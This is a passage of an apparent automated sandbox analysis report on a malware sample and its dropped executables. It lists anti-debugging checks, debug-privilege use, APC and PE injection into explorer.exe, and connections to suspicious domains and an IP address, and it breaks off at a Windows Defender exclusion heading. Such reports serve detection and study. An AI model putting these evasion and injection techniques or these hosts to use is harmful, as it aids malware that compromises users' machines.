Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3EE4 mov eax, dword ptr fs:[00000030h] 20_2_6ABA3EE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3EE4 mov eax, dword ptr fs:[00000030h] 20_2_6ABA3EE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB936CC mov eax, dword ptr fs:[00000030h] 20_2_6AB936CC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6A63B mov eax, dword ptr fs:[00000030h] 20_2_6AB6A63B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6A63B mov eax, dword ptr fs:[00000030h] 20_2_6AB6A63B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0E21 mov eax, dword ptr fs:[00000030h] 20_2_6ABA0E21
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE5623 mov eax, dword ptr fs:[00000030h] 20_2_6ABE5623
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF2E14 mov eax, dword ptr fs:[00000030h] 20_2_6ABF2E14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6C600 mov eax, dword ptr fs:[00000030h] 20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6C600 mov eax, dword ptr fs:[00000030h] 20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6C600 mov eax, dword ptr fs:[00000030h] 20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB93E70 mov eax, dword ptr fs:[00000030h] 20_2_6AB93E70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FE3F mov eax, dword ptr fs:[00000030h] 20_2_6AC1FE3F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA37F5 mov eax, dword ptr fs:[00000030h] 20_2_6ABA37F5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB mov eax, dword ptr fs:[00000030h] 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63FC5 mov eax, dword ptr fs:[00000030h] 20_2_6AB63FC5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63FC5 mov eax, dword ptr fs:[00000030h] 20_2_6AB63FC5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63FC5 mov eax, dword ptr fs:[00000030h] 20_2_6AB63FC5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B73D mov eax, dword ptr fs:[00000030h] 20_2_6AB8B73D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B73D mov eax, dword ptr fs:[00000030h] 20_2_6AB8B73D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66730 mov eax, dword ptr fs:[00000030h] 20_2_6AB66730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66730 mov eax, dword ptr fs:[00000030h] 20_2_6AB66730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB66730 mov eax, dword ptr fs:[00000030h] 20_2_6AB66730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E730 mov eax, dword ptr fs:[00000030h] 20_2_6AB9E730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64F2E mov eax, dword ptr fs:[00000030h] 20_2_6AB64F2E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64F2E mov eax, dword ptr fs:[00000030h] 20_2_6AB64F2E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38F6A mov eax, dword ptr fs:[00000030h] 20_2_6AC38F6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94710 mov eax, dword ptr fs:[00000030h] 20_2_6AB94710
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8F716 mov eax, dword ptr fs:[00000030h] 20_2_6AB8F716
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFFF10 mov eax, dword ptr fs:[00000030h] 20_2_6ABFFF10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFFF10 mov eax, dword ptr fs:[00000030h] 20_2_6ABFFF10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB92F70 mov eax, dword ptr fs:[00000030h] 20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E760 mov eax, dword ptr fs:[00000030h] 20_2_6AB8E760
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E760 mov eax, dword ptr fs:[00000030h] 20_2_6AB8E760
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6A745 mov eax, dword ptr fs:[00000030h] 20_2_6AB6A745
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DF4C mov eax, dword ptr fs:[00000030h] 20_2_6AB9DF4C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64CB0 mov eax, dword ptr fs:[00000030h] 20_2_6AB64CB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38CD6 mov eax, dword ptr fs:[00000030h] 20_2_6AC38CD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6649B mov eax, dword ptr fs:[00000030h] 20_2_6AB6649B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6649B mov eax, dword ptr fs:[00000030h] 20_2_6AB6649B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB61480 mov eax, dword ptr fs:[00000030h] 20_2_6AB61480
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC214FB mov eax, dword ptr fs:[00000030h] 20_2_6AC214FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 mov eax, dword ptr fs:[00000030h] 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62CDB mov eax, dword ptr fs:[00000030h] 20_2_6AB62CDB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39CB3 mov eax, dword ptr fs:[00000030h] 20_2_6AC39CB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64439 mov eax, dword ptr fs:[00000030h] 20_2_6AB64439
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38450 mov eax, dword ptr fs:[00000030h] 20_2_6AC38450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9BC2C mov eax, dword ptr fs:[00000030h] 20_2_6AB9BC2C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38C75 mov eax, dword ptr fs:[00000030h] 20_2_6AC38C75
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC01 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC01
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7FC77 mov eax, dword ptr fs:[00000030h] 20_2_6AB7FC77
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B mov eax, dword ptr fs:[00000030h] 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21C06 mov eax, dword ptr fs:[00000030h] 20_2_6AC21C06
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA5C70 mov eax, dword ptr fs:[00000030h] 20_2_6ABA5C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3740D mov eax, dword ptr fs:[00000030h] 20_2_6AC3740D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3740D mov eax, dword ptr fs:[00000030h] 20_2_6AC3740D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3740D mov eax, dword ptr fs:[00000030h] 20_2_6AC3740D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8746D mov eax, dword ptr fs:[00000030h] 20_2_6AB8746D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38C14 mov eax, dword ptr fs:[00000030h] 20_2_6AC38C14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFC450 mov eax, dword ptr fs:[00000030h] 20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFC450 mov eax, dword ptr fs:[00000030h] 20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91DB5 mov eax, dword ptr fs:[00000030h] 20_2_6AB91DB5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91DB5 mov eax, dword ptr fs:[00000030h] 20_2_6AB91DB5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91DB5 mov eax, dword ptr fs:[00000030h] 20_2_6AB91DB5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB935A1 mov eax, dword ptr fs:[00000030h] 20_2_6AB935A1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63591 mov eax, dword ptr fs:[00000030h] 20_2_6AB63591
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC18DF1 mov eax, dword ptr fs:[00000030h] 20_2_6AC18DF1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB695F0 mov eax, dword ptr fs:[00000030h] 20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB695F0 mov ecx, dword ptr fs:[00000030h] 20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB995EC mov eax, dword ptr fs:[00000030h] 20_2_6AB995EC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB615C1 mov eax, dword ptr fs:[00000030h] 20_2_6AB615C1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC13D40 mov eax, dword ptr fs:[00000030h] 20_2_6AC13D40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h] 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h] 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B mov eax, dword ptr fs:[00000030h] 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6AD30 mov eax, dword ptr fs:[00000030h] 20_2_6AB6AD30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 mov eax, dword ptr fs:[00000030h] 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F51D mov eax, dword ptr fs:[00000030h] 20_2_6AB6F51D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C577 mov eax, dword ptr fs:[00000030h] 20_2_6AB8C577
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8C577 mov eax, dword ptr fs:[00000030h] 20_2_6AB8C577
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB87D50 mov eax, dword ptr fs:[00000030h] 20_2_6AB87D50
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38D34 mov eax, dword ptr fs:[00000030h] 20_2_6AC38D34
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3D43 mov eax, dword ptr fs:[00000030h] 20_2_6ABA3D43
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6354C mov eax, dword ptr fs:[00000030h] 20_2_6AB6354C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6354C mov eax, dword ptr fs:[00000030h] 20_2_6AB6354C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3540 mov eax, dword ptr fs:[00000030h] 20_2_6ABE3540
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C30D90 mov eax, dword ptr fs:[00000030h] 24_2_02C30D90
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Code function: 24_2_02C3092B mov eax, dword ptr fs:[00000030h] 24_2_02C3092B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\iwbavbe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426440
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB96B90 rdtsc 20_2_6AB96B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\69B.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1254.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\3C84.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 13_1_004026C8 LdrLoadDll, 13_1_004026C8
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00426440
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D1B0
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 10_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_00426440
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 10_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_0041D1B0
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 11_2_00420A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00420A60
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Code function: 11_2_0041D2F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_0041D2F0
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 21_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_00426440
Source: C:\Users\user\AppData\Roaming\iwbavbe Code function: 21_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_0041D1B0

HIPS / PFW / Operating System Protection Evasion:

Early bird code injection technique detected
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\31F4.exe
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: iwbavbe.6.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write
Injects a PE file into foreign processes
Source: C:\Users\user\AppData\Local\Temp\69B.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Thread created: C:\Windows\explorer.exe EIP: 44E1920
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe Thread created: unknown EIP: 4E51920
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Thread created: unknown EIP: 4F819C0
Source: C:\Users\user\AppData\Local\Temp\46D6.exe Thread created: unknown EIP: 6871920
Adds a directory exclusion to Windows Defender
